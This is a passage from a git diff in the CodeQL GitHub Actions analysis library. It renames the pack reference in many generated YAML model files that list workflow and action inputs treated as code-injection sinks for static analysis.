"code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index 2e3c2530eba..200f6bbfc43 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index 58f3d831423..a542370c7de 100644 --- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index dfa20e1f9d7..8b529012be2 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index 144c4e456dc..defeb5f7974 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index 51348fb1b56..7eba6fb3b00 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index c3fa787b288..fc8085843dd 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 9845c089b32..2d831ccbced 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index 2986040e8cd..b8892f32d7f 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index 7dafcd5b71b..3809c827dda 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 1b5fb0e1d97..88f4246b162 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index 28ec54f1d9d..35d394a116f 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index 21f35339952..234ed7fef07 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index 594b0cc9bb9..e9ad23c8331 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index a2fbd510bb2..49ac7d2bf71 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 927cbd449e3..99041db6e26 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index 52037a671cf..dd132b20a05 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index b71a87193b6..e87804d0cf8 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index 24361a7d29e..0927d449d37 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index be71c38f124..a98bbaed725 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 889edaac1bb..0beb8e432fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index b2b970152de..0d0f030c623 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index f885a44f46e..3574c02b4ed 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index 10f06693d26..1ce82c53df5 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 43d0fe1c2ce..f2eec6681d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index 4fb13f0a18c..a4a008154f5 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 96b73aa06de..d85bd42f7a4 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index 554974bfe6f..391b22d8867 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index f1c6ec345d1..962623cd913 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 2cfa8a46c83..99ce22f3f64 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index 8c3c5a58502..e52acbad13c 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index aa75ce39295..989f9aae937 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index e9dd33c6f17..e34a4b3910b 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index a0bd22ad352..9a1991ddc81 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index fb98c6a7d9b..0316d82a5e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index 0c108422a94..16d8ba2b926 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index c820724bd71..1a59c9bf160 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index 51d32bde4ba..fb13f2451d9 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index b747a4a27df..ac92d435f74 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index c5c26bc7926..278801efa2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index 62a1a853937..f426656c076 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index b6c0c1b5e64..17d1c687f62 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index 005db8e9ddc..4a8e4cc4378 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index a1090c45ae0..80333528952 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 051aacfeee0..b1a056e2836 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 1fb380a3a72..906eb810c89 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index a8b8234e1fc..75469b1a80a 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 108bbad1c07..192f1d690b5 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index 42ed67f3d20..d8f7648e808 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index a664d6063e3..9789709eac7 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index 6270ab5842e..60e388c076b 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml index 0c4d975e012..2cdfb52d976 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml 